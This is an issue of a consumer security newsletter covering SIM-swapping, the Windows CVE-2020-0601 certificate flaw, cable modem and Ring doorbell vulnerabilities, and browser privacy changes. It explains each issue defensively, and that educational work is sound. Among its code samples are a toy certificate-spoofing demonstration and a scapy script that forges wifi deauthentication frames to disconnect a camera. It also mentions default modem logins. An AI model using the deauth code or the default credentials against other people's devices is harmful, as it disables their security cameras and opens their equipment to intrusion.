Loose Leaf Security Weekly, Issue 18

It's been a busy week in security news, with another reason to avoid SMS-based two-factor authentication and another reason to apply software updates as soon as you can - even on your cable modem. There's good news too, though: ad tracking has gotten significantly less effective, and Google has introduced a new way to secure your account. Also, waiting for software updates is the perfect excuse to make a pot of tea.

If someone forwarded this to you, you can sign up yourself at https://looseleafsecurity.com/newsletter.

Tip of the week

One of our stories this week is new research about ways that attackers can trick your cell phone company into moving your account over to their device, an attack often called "SIM-swapping" or "SIM-jacking." Even apart from this risk, there are good reasons to prefer non-SMS-based two-factor authentication methods. The SMS protocol itself is insecure, and it's not outside the realm of possibility that an attacker could eavesdrop on a text message being sent to you. (We haven't seen any websites offer to send two-factor codes via end-to-end encrypted protocols like iMessage or Signal.) For methods other than SMS, you're usually able to set up multiple two-factor authentication mechanisms and use one as a backup; at the very least, if a site lets you scan a QR code into a code-generator app, you can scan it simultaneously with multiple phones (as we suggested in a previous tip of the week). If you're traveling or out of good cell range (or even if the cell towers are just congested, which happens occasionally), you might not be able to receive an SMS in a timely fashion. Finally, and most importantly in our opinion, hardware security keys validate the identity of the website before authenticating you, which protects you from phishing attacks - your computer is much less likely to be fooled by a similar-looking URL than you are.
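
To see why the QR-code trick works, here's a minimal sketch of the code-generator math (the TOTP algorithm from RFC 6238). The QR code just encodes a shared secret, so every device that scans it computes identical codes. The secret below is a made-up example, not anyone's real secret.

    import base64, hashlib, hmac, struct, time

    def totp(secret_b32, period=30, digits=6):
        # The QR code you scan is essentially this base32 secret plus labels.
        key = base64.b32decode(secret_b32.upper())
        counter = int(time.time()) // period          # same on every device
        digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = digest[-1] & 0x0F                    # "dynamic truncation"
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    # Any device holding the same secret produces the same 6-digit code.
    print(totp("JBSWY3DPEHPK3PXP"))                   # made-up example secret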

If you have accounts configured for SMS-based two-factor authentication, see if they support multiple methods. Many sites have been adding improved support recently - check out the community-maintained site twofactorauth.org. If you're not sure what sites you've enabled SMS-based authentication on, maybe it's time for some two-factor tidying - take advantage of your password manager's tagging features to make a note of what authentication methods you've got enabled for each site. That way, you can cross-check against updated lists like twofactorauth.org and you also have an easy list of what to update if you get a new phone or a new security key.

In the news

Is SMS 2FA Secure? Researchers from Princeton University have figured out some easy ways for an attacker to trick your phone carrier into giving them access to your account through a SIM-jacking attack. Usually, if you call your cell phone provider and say that your SIM card doesn't work, they'll try to verify your identity in one of a few ways, such as by asking for recent activity on your account. The researchers, playing the role of an attacker, found that they can generate some activity: some carriers will ask about the last time you paid, but there's no authentication on who's allowed to pay for an account, so the attacker could just buy a refill card, apply it to your account, and then call up and describe the transaction. Many carriers also asked about recent outgoing calls, but an attacker could just leave a message asking you to call them back, pretending to be some important organization. Finally, a few carriers didn't even try to secure the reset at all - some asked no questions, and one gave them multiple tries to guess the day of the last payment, even telling them if they were getting closer or farther from the right day.

The researchers tried out the attacks on prepaid accounts with the major US wireless providers (AT&T, T-Mobile, Tracfone, US Mobile, and Verizon) and were able to SIM-jack a test account at all of them. Losing your phone number to an attacker is scary enough and a security problem on its own, but the researchers are framing their work as an attack on SMS-based two-factor authentication, which can be an even worse problem. If your email account is protected by SMS-based two-factor authentication, for instance, an attacker who hijacks your phone number can break into your email and then request password resets for probably all your other accounts, such as your online banking account - and they can make it much harder for you to get through to your cell provider and prove that you, not the attacker, should actually have the account.

Whose Curve Is It Anyway? This past "Patch Tuesday" featured a fix for a particularly bad bug in Windows: the logic for validating digital certificates for websites and signed software could be easily fooled. Many recent certificates use an approach called elliptic-curve cryptography, which involves calculations about points on a mathematical curve called an elliptic curve. To verify a signature using elliptic-curve cryptography, you need to make sure you have trustworthy information about both the signer's public key, which is a point on the curve, and the curve itself. Unfortunately, while Microsoft's code checked the public key, it could be tricked into doing its calculations with different curve parameters, and there's an easy way for an attacker who knows basic algebra to pick new parameters under which they can solve for the private key that corresponds to someone else's public key. Cryptographers had warned about the possibility of this mistake as far back as 2004 - it's known as a "domain parameter shifting attack." The vulnerability is formally tracked as CVE-2020-0601, though some folks have tried to give it snappier names: security firm Trail of Bits put up a website calling it "Whose Curve Is It Anyway," and security engineer Kenn White has a blog post about it that calls it "Chain of Fools," because the practical effect is that an attacker can make a fake version of a trusted certificate authority and chain their own certificate to the fake authority.
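
To make the algebra concrete, here's a toy sketch of the idea - not Microsoft's actual code, and the tiny curve and numbers below are made up purely for illustration. If a verifier checks only that the public key matches and lets a certificate carry its own curve parameters, an attacker can declare the public key itself to be the generator point and claim a private key of 1:

    # Toy curve y^2 = x^3 + 2x + 3 over the integers mod 97 - far too small
    # to be secure, just enough to show the shape of the attack.
    P, A = 97, 2

    def inv(x): return pow(x, P - 2, P)  # modular inverse

    def add(p, q):  # elliptic-curve point addition (None = point at infinity)
        if p is None: return q
        if q is None: return p
        (x1, y1), (x2, y2) = p, q
        if x1 == x2 and (y1 + y2) % P == 0: return None
        m = ((3 * x1 * x1 + A) * inv(2 * y1) if p == q
             else (y2 - y1) * inv(x2 - x1)) % P
        x3 = (m * m - x1 - x2) % P
        return (x3, (m * (x1 - x3) - y1) % P)

    def mul(k, p):  # scalar multiplication by repeated doubling
        r = None
        while k:
            if k & 1: r = add(r, p)
            p, k = add(p, p), k >> 1
        return r

    G = (3, 6)     # the standard, published generator point
    d = 13         # the CA's secret key - the attacker never learns this
    Q = mul(d, G)  # the CA's public key, as cached by the verifier

    # If the verifier never checks that the certificate uses the standard G,
    # the attacker supplies generator G' = Q and claims private key 1, since
    # 1 * Q == Q - and now they can sign things that appear to come from the CA.
    assert mul(1, Q) == Q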

The mistake was originally discovered by the NSA, who found it bad enough that they alerted Microsoft and published a warning about it instead of figuring out how to exploit it for their own ends. If you're running Windows, make sure to apply software updates and reboot as soon as you can, if you haven't already. The math is simple enough that multiple groups, including Trail of Bits, were able to figure out the vulnerability from the NSA's description within a couple of days.

If that's not enough reason to patch your Windows computer, there are also 48 other important security bug fixes in Tuesday's patches. Fortunately, the code that Windows Update uses to validate updates isn't vulnerable to the bug.

Don't forget to patch your cable modem: Researchers at Lyrebirds, a security company in Denmark, have discovered a serious bug in many popular cable modems. The bug, which they call "Cable Haunt," allows any website you visit to exploit your cable modem and take control of the code it runs, possibly using your internet connection for nefarious purposes or even eavesdropping on or messing with your internet traffic. The bug was originally introduced in "reference software" for designing cable modems, and it seems just about all the vendors of cable modems have based their code on the reference software and therefore picked up the bug. If you rent your cable modem from your ISP, you'll need your ISP to apply a firmware update to your cable modem. If you own your modem, you should check the manufacturer's website to see whether an update is available and how to install it. You might want to buy your own cable modem from a company known to reliably provide software updates - since the cable modem protocol is standard, you don't usually need to rent one (and it's often a good bit cheaper over time, too). The Cable Haunt website has a list of vulnerable firmware versions; you might be able to see what cable modem firmware you have by visiting http://192.168.100.1 or http://192.168.100.1:8080, which is the internal address most cable modems use - the login credentials are often built-in defaults such as "admin" / "password" which you can find with a web search. (If you're so inclined, they also have a sample exploit as a downloadable Python program, but the vulnerability can be exploited just from a website - we think they're just not providing a web version of the exploit to make life a bit harder for people trying to build a real exploit.)

Advanced Protection gets even more advanced: In our episode "Two-factor authentication and account recovery," we briefly discussed Google's Advanced Protection Program. At the time, it involved setting up two security keys (one primary, one backup) as your only second-factor options to log in. Google has now made it possible to enroll in the Advanced Protection Program even if you don't have hardware security keys, as long as you have an Android or iOS phone. Android 7 and up have the ability to act as a security key (which we've discussed previously), and on iOS, you can download the Google Smart Lock app.

The Advanced Protection Program prevents you from using most non-Google apps with your Google account, which is good for security - it prevents you from accidentally authorizing an app to get access to your email or private files, and it also ensures you aren't using apps that save your actual password on disk insecurely. However, if there's a third-party app that you regularly use with your Google account, think carefully about whether you can switch away from it before turning on Advanced Protection. (A few third-party apps, like Thunderbird and Apple Mail, are still allowed.) Advanced Protection also makes it much harder to regain access to your account if you lose your second factor. Again, this is good for security because it prevents someone other than you from breaking in, but we'd strongly suggest you think about your backup options before taking advantage of the new one-click enrollment. Previously, this risk of getting locked out was exactly why Google required two security keys. With the new change, they'll let you reconfigure your account settings from another device where you're logged in. According to Mark Risher, Google's director of product management for security and privacy, when you enroll from your phone, they'll check that you're signed in on some other device you can use as a backup, but they still recommend configuring a backup security key. We'd also add that a real security key is useful for protecting your non-Google accounts, so if you turn on Advanced Protection for your Google account, we'd suggest going ahead and ordering one.

Disabling smart doorbells by just asking: Software engineer Matthew Garrett took a look at how to attack Ring video doorbells using wifi deauthentication attacks. He found that his walk home inside his large apartment building passed by a neighbor's Ring device, and because he has something of a hobby of finding security holes in Internet-of-Things devices, he decided to get a Ring doorbell of his own and see what he could learn about it. It turns out that it's vulnerable to a straightforward and well-known design flaw in wifi: even on an encrypted network, there's no authentication on the wifi message telling a device to disconnect. So anyone within wifi range - even someone not yet in view of the camera - can simply tell the doorbell to leave its wifi network, preventing it from uploading video as they walk by. If you're relying on one of these devices for your own security, the best option is to find a video camera that supports a wired connection, such as over Ethernet: that way nobody can disconnect it without physically unplugging it. Depending on your wifi router, you might be able to enable the 802.11w extension to the wifi protocol for "protected management frames," which adds security to the disconnect message (and some other messages). Better yet, the recent WPA3 standard requires protected management frames, so if you're buying new routers and devices in the near future, make sure they support WPA3.
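
For the curious, here's roughly what that forged disconnect looks like, sketched with the scapy packet library - the point being that the frame is just three addresses and a reason code, with no signature or shared secret for the doorbell to verify. The MAC addresses below are placeholders, sending raw frames requires a wifi card in monitor mode and root privileges, and this should only ever be tried against a network you own.

    from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

    AP = "aa:bb:cc:dd:ee:ff"        # placeholder: the wifi router's MAC
    DOORBELL = "11:22:33:44:55:66"  # placeholder: the camera's MAC

    # A deauthentication frame: management frame (type 0), subtype 12.
    # Nothing in it proves the sender is actually the router.
    frame = (RadioTap()
             / Dot11(type=0, subtype=12, addr1=DOORBELL, addr2=AP, addr3=AP)
             / Dot11Deauth(reason=7))

    # sendp(frame, iface="wlan0mon", count=10)  # needs a monitor-mode interface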

Medical images exposed: Security firm Greenbone Networks has been watching the growing number of unsecured medical image servers on the internet: as of November, they found over a billion images online from over 35 million examinations. Tech news site TechCrunch and patient advocacy site The Mighty took a look at this situation in detail. TechCrunch's article discusses the technical background behind how these images came to be exposed, explaining how images in a standard medical-industry format called DICOM are stored on PACS servers for sharing between medical practitioners, and how many medical providers do not set up proper security for their PACS servers. The Mighty has a good discussion of the practical risks and how you can protect yourself. The DICOM format also includes information about the patient in the image, generally including their name and date of birth and often including other identifiers like their social security number. This means that unprotected images, in addition to leaking your actual medical information, are also a juicy source of information for people committing various types of fraud, from insurance fraud to regular identity theft. The Mighty suggests reading your explanation of benefits carefully when your insurance processes a claim, to make sure you're being recorded as having only the treatment you actually had (the same reason you should check your credit reports periodically). They also caution against using email - many medical practices have a "secure messaging system" of some sort, where you log into a website to view data, and even if it's not much more secure than your email, having your medical data behind a website with a login makes it much harder for someone to casually pick up the images while scraping the entire internet. If your doctor's office wants to send you data by email, push back and see if they have other options. More generally, when you're considering going to a new doctor or specialist, ask them about their data privacy practices ahead of time and make it clear to them that this is something you care about as a patient.
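
As an illustration of how much personal data rides along inside each image, here's a minimal sketch using the pydicom library - the filename is a placeholder, and which identifier fields are filled in varies by provider:

    import pydicom  # a widely used Python library for reading DICOM files

    # "scan.dcm" is a placeholder; the patient metadata travels inside the
    # same file as the image itself.
    ds = pydicom.dcmread("scan.dcm")
    print(ds.get("PatientName"))       # full name
    print(ds.get("PatientBirthDate"))  # date of birth
    print(ds.get("PatientID"))         # sometimes an insurance ID or SSN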

It's a Chrome! It's an Edge! Microsoft just released the latest generation of their Edge web browser - now based on Chromium, the open-source core of Google Chrome, instead of Microsoft's own browser engine. The benefits include both increased website compatibility, since websites that work well on Chrome should work well on the new Edge, and a way for Microsoft and Google to join forces on improving the Chromium code. (Last May, The Verge took a deeper look at this surprising decision and at how Microsoft and Google engineers have been working together.) The new Edge browser is available not just for Windows 10, but also for older versions of Windows and even macOS. Hopefully this is the final nail in the coffin for Internet Explorer, which has not kept up with the state of the art in browser security, let alone features and performance - even the former product manager for Internet Explorer wants you to stop using it. Really.

Speaking of Internet Explorer, Microsoft just announced that there's a serious vulnerability in how it handles JavaScript which could enable an attacker to run code on and take control of your computer, and moreover, they're aware of "limited targeted attacks" using the vulnerability. The announcement came a few days after last week's Patch Tuesday, and the bug won't be fixed until next month's Patch Tuesday, so it's all the more reason to stop using Internet Explorer as soon as you can.

I hope they're getting targeted ads for the world's tiniest violin: AppleInsider reports on the sad fortunes of ad tracking companies after the release of iOS 13, which includes Safari's "stunningly effective" Intelligent Tracking Prevention as well as a feature that warns you about apps using your location in the background and asks you to confirm that you do want them tracking you. According to one company, 80% of users who upgraded to iOS 13 disabled background tracking, and according to another, the overall share of users sharing their location data has dropped from almost 100% three years ago to about 50% today. An executive from one company says, "People have decided to stop their phones' sharing location data at a universal level." Apps can still attempt to guess your location from the source of your internet connection, but the quality of that data is poor.

Chrome can have a few cookies, as a treat: In our episode "Web security continued: cookies, plugins, and extensions," we discussed the benefits and risks of cookies, which are valuable for allowing you to log into websites but can also be a privacy problem. When you load a website with an image or button from another site - an ad or a "share this on social media" button, perhaps - the web request that loads that image contains any saved cookies for that site. Each advertiser or social media service can use this to track your browsing activity across lots of sites on the web, and if you're logged into the social media site, they can even associate your browsing with your account. Cookies sent to a site that isn't the site you're directly visiting are called "third-party cookies," and some browsers have been disabling them by default - Safari did so in 2017 and Firefox also switched the default last year.

Chrome just announced that they plan to follow suit - but not quite yet. They want to make sure that they're addressing "the needs of users, publishers, and advertisers." They have a reasonable-sounding argument: "By undermining the business model of many ad-supported websites, blunt approaches to cookies encourage the use of opaque techniques such as fingerprinting (an invasive workaround to replace cookies), which can actually reduce user privacy and control." However, it seems fair to note that Google cares quite a bit about not undermining their own business model - for instance, Ars Technica has subheadlined their article, "The ad company wants to protect its revenue model and user privacy at the same time." Chrome's approach, the "Privacy Sandbox," aims to give enough information to advertisers to let them target ads and make sure their ads are effective, but tries to prevent them from building up too much information about your browsing behavior.

Chrome is making another change to cookie behavior in its next version, coming out in February: cookies will no longer be sent on cross-site requests unless the site that set them has specifically opted in. The goal of this change is more security than privacy, since advertisers and other tracking companies can always opt in to their cookies being sent. One of the problems with cookies keeping you logged in is that if one website has a link or a form that goes to another website, your cookies are sent along with that request, so if the target website isn't careful, a malicious site can try to take actions on your behalf. (Imagine, for instance, clicking submit on a comment form, where the submit button actually sends the comment over to your Facebook wall or your Twitter feed.) Traditionally, this has required websites to take steps to prevent such "cross-site request forgery" attacks (often abbreviated CSRF or XSRF) by carefully checking where each request comes from. With the new change, websites need to label cookies as being okay to send on cross-site requests, which should eliminate the vast majority of CSRF attacks, but it carries some risk of breaking older websites - particularly internal corporate websites that haven't had to care much about security isolation across websites within the same company.
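
The label in question is the cookie's "SameSite" attribute: Chrome will start treating cookies without one as "SameSite=Lax" (withheld from cross-site requests, with some exceptions for top-level navigation), and a site that genuinely needs its cookies sent cross-site has to mark them "SameSite=None; Secure". Here's a minimal sketch using the Flask web framework - the route, cookie names, and values are all made up for illustration:

    from flask import Flask, make_response

    app = Flask(__name__)

    @app.route("/login")
    def login():
        resp = make_response("logged in")
        # Lax (the new default): sent when you visit the site directly,
        # withheld on cross-site requests - which is what stops CSRF.
        resp.set_cookie("session", "made-up-value", secure=True,
                        httponly=True, samesite="Lax")
        # None: explicitly opted in to cross-site use, e.g. for an
        # embedded widget; it must also be marked Secure (HTTPS-only).
        resp.set_cookie("widget_pref", "dark", secure=True,
                        samesite="None")
        return resp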

Chrome had one last privacy-related announcement last week. Traditionally, web requests have included a header called the "User-Agent," which identifies the exact version number of your browser and your operating system. While this is useful for allowing websites to tailor content to your browser, it's also a significant source of information for fingerprinting, making you easier to track. (It also causes some long-term difficulties for the web platform, in that it permits sites to say things like "Your browser isn't compatible with this site" even if a newer version of your browser actually is compatible.) Chrome is planning to stop changing the User-Agent information with each browser update and eventually hopes to get rid of it, replacing it with a scheme that requires websites to ask if they need specific information about your browser. In order to discourage websites from asking, they hope to introduce a "privacy budget," where your browser can say no if a website has requested too much potentially identifying information.
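
As a rough sketch of the difference (the exact header names and formats were still in flux as of this writing): today every request automatically carries a detailed User-Agent string, while under the proposal a server has to ask for specifics before the browser will send them.

    # Today: sent automatically with every request, to every site.
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2)
        AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36

    # Proposed: the server must explicitly request the details it wants...
    Accept-CH: Sec-CH-UA-Platform, Sec-CH-UA-Full-Version

    # ...and only then does the browser include them on later requests.
    Sec-CH-UA-Platform: "macOS"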

Chrome apps are going away: Many years ago, Google introduced a feature called "Chrome Apps," things you could download via the Chrome store (the same place you download extensions) and which run inside Chrome, but which act more like normal desktop apps. Chrome Apps could make use of a number of powers that weren't allowed to websites or even extensions, like running offline and in the background, making unrestricted network connections, and even running compiled code and not just JavaScript. They were particularly valuable on Chrome OS, which ran only the Chrome web browser and no other apps. Over the years, most of the functionality of Chrome Apps has become available to regular web pages, including the ability to run offline, and Google warned that they'd get rid of Chrome Apps everywhere other than Chrome OS. They've now announced that they're killing off Chrome Apps entirely: this June, they'll stop working on Windows, Mac, and Linux, and in June 2022 they'll also stop working on Chrome OS.

We previously talked about the differing security models of standard desktop apps and websites: desktop apps evolved from single-user and even single-program systems, where there was little reason to restrict what an application could do, but interactive websites evolved from plain web pages, gaining features incrementally and cautiously. While it's been a long time in the making, Google's announcement is a sign that the web platform is just about ready to do everything traditional apps can do, just in a much safer way. For instance, traditional apps (and Chrome apps) can connect to anything they can reach on the network using any protocol, which is certainly useful - it's how browsers themselves work - but it also enables worms and viruses to spread easily. The web platform now has fairly complicated and powerful mechanisms for servers to opt into allowing unrelated websites to access them, but it starts from a baseline of no access: websites can make only very limited contact with servers that don't specifically permit access.
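
To make that baseline concrete, here's a minimal sketch of the server-side opt-in using only Python's standard library (the allowed origin is a placeholder): unless a response carries a header like this, browsers refuse to let scripts on other websites read it.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            # Without this header, a script on another origin can trigger
            # the request but is forbidden from reading the reply - the
            # web's baseline is no cross-origin access.
            self.send_header("Access-Control-Allow-Origin", "https://app.example")
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(b'{"ok": true}')

    HTTPServer(("localhost", 8000), Handler).serve_forever()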

What we're reading

Anti-facial recognition but make it fashion: A topic that keeps coming up in this newsletter is the increasing prevalence of surveillance, and an article in The Seattle Times surveyed some of the ways technologists and artists are using makeup, accessories, and clothing to confuse facial recognition algorithms. (Masks or face-covering scarves would be likely candidates for avoiding facial scans, but often, anti-mask laws render them impractical.) Two makeup-based defenses are highlighted in the article, both of which we've discussed before in our episode "Security stories: surveillance databases, unlocking apps, unexpected photo booths, and evolving data." First, Juggalo makeup, the clown-inspired black-and-white face paint used by fans of the music group Insane Clown Posse, happens to confuse facial recognition algorithms. For the other, CV Dazzle, artist Adam Harvey drew inspiration from the way dazzle camouflage on World War I ships obscured depth and size perception; his project "uses avant-garde hairstyling and makeup designs to break apart the continuity of a face." Another artist, Leo Selvaggio, suggests with his URME Surveillance project that others wear masks of his face so that facial recognition incorrectly attributes their actions to him. Trendy mirrored sunglasses can help obscure your eyes, but Reflectacles' IR-reflecting glasses can also prevent cameras from seeing nearby parts of your face, further thwarting algorithms from using other facial features to identify you. Finally, the article mentions Kate Rose's t-shirts featuring license plates, which don't work against facial recognition algorithms but can trick automated license plate readers.

We'd like to also highlight two other anti-facial recognition projects that weren't in The Seattle Times article. First, t-shirts with "abstract" or "trippy" art designed by a team of researchers from Northeastern University, IBM, and MIT can sometimes trick algorithms into not recognizing your body as a person, even if your face is completely unobscured. (Of course, this won't prevent someone from manually reviewing photos and identifying your face later.) Second, artist Joselyn McDonald uses flowers as makeup to obscure key facial features.

Happy goldfish bowl to you, to me, to everyone: There aren't many legal restrictions on facial recognition technology so far, and there certainly don't seem to be very many technical limitations, either. One of the few limitations in practice has been building up a database of people's faces to find matches for a photo - something that's a bit easier for government agencies with access to ID databases but still not particularly extensive. Private companies have fewer options, but someone could create a larger database for a facial recognition system with more reference photos of a wider range of people by scraping social media profiles and other public websites. That's precisely what Clearview AI did: when a photo is uploaded to Clearview, the company runs facial recognition against a database of photos scraped from Facebook, YouTube, Venmo, and millions of other websites and returns matching photos along with links to the pages that contain them. This isn't novel technology so much as a few existing technologies cobbled together with a willful disregard for the scraping prohibitions common to social media sites. (According to the article, Google and Facebook have both built facial recognition from their databases of photos, but both companies have stated those projects have been discontinued.) Hoan Ton-That, Clearview AI's founder, isn't concerned about those terms of service and has told The New York Times, "Facebook knows" - which wouldn't be too surprising, as Peter Thiel is both an investor in Clearview and a Facebook board member since 2005.

Ton-That did not create Clearview's facial recognition software with a particular audience in mind, but in part through offering 30-day free trials to police officers, the product has caught on with law enforcement: over 600 law enforcement agencies are now using Clearview. Photos uploaded by police further expand Clearview's database, which, in turn, increases its appeal for law enforcement agencies that haven't signed up yet. Clearview also markets their app to private security, and this appears to be just the first step in expanding Clearview's user base. "Police officers and Clearview's investors predict that its app will eventually be available to the public," the Times says, and Clearview will then be even more ripe for abuse - for instance, by stalkers looking to uncover pseudonymous profiles of their victims.

Clearview's unconventional approach to growing its database presents risks not just to the intended targets of facial recognition but to people who look enough like them to confuse the algorithm. Off-the-shelf facial recognition technology has well-known accuracy problems, especially with identifying minorities, and ultimately Clearview's database is coming from photos on social media sites, which have gone through no process to ensure that the names associated with them are accurate. Clearview's customers don't seem to mind that no one has tested the product for false positives, though - the Times quoted one police captain as saying, "For us, the testing was whether it worked or not."

Al Gidari of Stanford's Center for Internet and Society told the Times, "Absent a very strong federal privacy law, we're all screwed," and we agree. There have been some promising efforts at regulating facial recognition technology: we've covered how a growing number of US cities are banning government use of facial recognition, which should prevent their police departments from using Clearview. The European Union is considering a five-year moratorium on "the use of facial recognition technology in public spaces" to give regulators some time to understand the risks before the technology gets out of hand, and the US Congress last week continued its hearings on facial recognition technology. Lawmakers from both major US parties are concerned not just about its accuracy problems but about the fundamental civil liberties implications: Republican Mark Meadows said that worries about accuracy have "missed the whole argument, because technology is moving at warp speeds," and Democrat Alexandria Ocasio-Cortez called it "some real-life Black Mirror stuff."

Until next time...

Update Windows, update your cable modem (if you can), update other things that can take updates, stop using Internet Explorer, and make sure you use your password manager's strong password generator feature to name your pets. (At least, we assume that's what The New Yorker means - neither your passwords nor the answers to your account recovery questions should be easily guessable things like "Rover" or "Missy.")

That wraps it up for this week - thanks so much for subscribing to our newsletter! If there's a story you'd like us to cover, send us an email at looseleafsecurity@looseleafsecurity.com. See y'all next week!

-Liz & Geoffrey